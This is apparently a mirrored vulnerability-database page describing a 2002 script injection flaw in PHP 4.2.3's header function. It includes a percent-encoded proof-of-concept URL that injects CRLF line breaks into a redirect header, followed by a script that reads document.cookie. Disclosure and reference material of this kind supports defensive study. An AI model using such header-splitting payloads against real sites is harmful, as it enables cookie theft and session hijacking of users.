PHP 4.2.3 – Header Function Script Injection

PHP 4.2.3 – Header Function Script Injection

漏洞ID 1053614 漏洞类型
发布时间 2002-09-07 更新时间 2002-09-07
图片[1]-PHP 4.2.3 – Header Function Script Injection-安全小百科CVE编号 N/A
图片[2]-PHP 4.2.3 – Header Function Script Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21776
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5669/info

PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems.

It has been reported that a vulnerability in the PHP header function exists. It may be possible for a user to supply arbitrary script code in an URL that would allow the injection of script code into the HTTP header. 

http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D

相关推荐: RedHat screen pty(7) Vulnerability

RedHat screen pty(7) Vulnerability 漏洞ID 1104480 漏洞类型 Origin Validation Error 发布时间 1999-10-21 更新时间 1999-10-21 CVE编号 N/A CNNVD-ID N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享